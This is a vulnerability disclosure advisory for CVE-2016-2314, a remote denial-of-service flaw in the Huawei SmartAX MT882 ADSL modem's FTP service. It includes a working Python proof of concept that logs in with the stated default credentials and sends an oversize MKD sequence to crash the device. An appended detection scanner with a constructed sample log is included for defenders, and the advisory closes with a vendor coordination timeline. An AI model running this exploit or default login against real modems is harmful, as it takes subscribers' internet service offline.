Security Advisory: FTP Vulnerability


  • Topic: Denial of Service (DoS) vulnerability in Huawei SmartAX MT882 ADSL Modem.
  • Class: Remote DoS.
  • Severity: Medium.
  • Date published: 2016-02-11
  • Date of last update: 2016-02-11
  • CVE number: CVE-2016-2314
  • Credits: Déborah Valeria Higa
  • Affects:
    • Product name: Huawei SmartAX MT882 ADSL Modem.
    • Affected version: V200R002B022 Arg


I. Background

The Huawei SmartAX MT882 ships with a GlobespanVirata ftpd 1.0 FTP service listening on TCP port 21.


II. Problem Description

The FTP service fails when the following sequence of commands is sent over the control connection:

  1. Log in with USER and PASS.
  2. Receive response.
  3. Create a directory with MKD, using a directory name 0xFA (250) bytes long.
  4. Send another command that operates on files or directories, such as CWD, RMD, XRMD, MKD, XMKD or DELE.
  5. Terminate command connection with QUIT.
  6. Receive response.


III. Impact

A remote attacker who logs in with the default user (admin) and password (tomenague) can follow the described steps to cause a DoS that suspends the operation of the device.


IV. Supporting Technical Details

Proof of concept:


import socket

TARGET = ('10.0.0.2', 21)   # modem address used in the original PoC

with socket.create_connection(TARGET) as s:
    # Steps 1-2: log in with the default credentials and read the response.
    s.sendall(b'USER admin\r\n')
    s.sendall(b'PASS tomenague\r\n')
    print(s.recv(4096).decode(errors='replace'))
    # Step 3: MKD with a directory name 0xFA (250) bytes long.
    s.sendall(b'MKD ' + b'A' * 0xFA + b'\r\n')
    # Step 4: a follow-up file/directory command (MKD here; CWD, RMD, XRMD, XMKD or DELE also apply).
    s.sendall(b'MKD A\r\n')
    # Steps 5-6: close the control connection and read the final response; the device stops responding.
    s.sendall(b'QUIT\r\n')
    print(s.recv(4096).decode(errors='replace'))
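Detection logic for the crash sequence described in sections II and IV, written as an added example that is not part of the original advisory. It assumes FTP control-channel commands have been captured (by an IDS or proxy) into lines of the constructed form "<session-id> <command> [argument]", and flags a login with the default admin account, an oversize MKD, and any file/directory command that follows it in the same session.

```python
import re

# Directory-name length that matches the advisory's crash condition (0xFA bytes).
OVERSIZE_MKD_LEN = 0xFA
# Commands that operate on files/directories and trigger the fault after an oversize MKD.
FOLLOWUP_CMDS = {"CWD", "RMD", "XRMD", "MKD", "XMKD", "DELE"}

# Constructed line format: "<session-id> <FTP command> [argument]" (not any product's log syntax).
LINE_RE = re.compile(r"^(?P<session>\S+)\s+(?P<cmd>[A-Za-z]{3,4})(?:\s+(?P<arg>.*))?$")


def scan_ftp_commands(lines):
    """Return (session, reason) findings for the MT882 ftpd crash pattern."""
    findings = []
    armed = set()   # sessions in which an oversize MKD has already been seen
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        session, cmd = m.group("session"), m.group("cmd").upper()
        arg = m.group("arg") or ""
        if cmd == "USER" and arg.lower() == "admin":
            findings.append((session, "login with the default 'admin' account"))
        # Check the follow-up command first so a second oversize MKD also counts as step 4.
        if session in armed and cmd in FOLLOWUP_CMDS:
            findings.append((session, f"{cmd} after oversize MKD: MT882 ftpd crash sequence"))
            armed.discard(session)
        if cmd == "MKD" and len(arg) >= OVERSIZE_MKD_LEN:
            armed.add(session)
            findings.append((session, f"MKD with {len(arg)}-byte name (>= 0x{OVERSIZE_MKD_LEN:X})"))
    return findings


# Constructed sample: sess1 reproduces the advisory's steps, sess2 is benign traffic.
SAMPLE_LOG = [
    "sess1 USER admin",
    "sess1 PASS ********",
    "sess1 MKD " + "A" * 0xFA,
    "sess1 CWD A",
    "sess1 QUIT",
    "sess2 USER alice",
    "sess2 MKD reports",
    "sess2 CWD reports",
]

if __name__ == "__main__":
    for session, reason in scan_ftp_commands(SAMPLE_LOG):
        print(session, reason)
```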


V. Report Timeline

  • 2015-10-31: contact Huawei Product Security Incident Response Team (PSIRT) to inform them that two vulnerabilities have been found in the Huawei SmartAX MT882 ADSL Modem. Send a draft advisory with technical details and PoC files.
  • 2015-11-01: Huawei PSIRT acknowledges reception of the advisory.
  • 2015-11-11: Huawei PSIRT confirms the FTP vulnerability and asks for both PoCs and for more information about the WHIP service.
  • 2015-11-13: send requested information.
  • 2015-11-16: Huawei PSIRT acknowledges.
  • 2015-11-25: Huawei PSIRT informs that the warranty for the MT882 has expired, but confirms that the replacement product MT882a does not have the two vulnerabilities.
  • 2015-11-25: inform Huawei PSIRT that the MT882 is still distributed by Argentina’s ISP Arnet.
  • 2015-11-27: Huawei PSIRT acknowledges.
  • 2016-01-15: request a status update.
  • 2016-01-15: Huawei PSIRT informs that they have contacted Argentina’s front line, which has notified Arnet, but the customer has not yet given a result. Argentina’s front line will ask the customer again next week.
  • 2016-01-22: Huawei PSIRT informs that Arnet uses HG532s as replacement.
  • 2016-01-23: contact Huawei PSIRT to inform them that the investigation is considered closed and ask for confirmation.
  • 2016-01-25: Huawei PSIRT acknowledges.
  • 2016-02-11: Security Advisory published.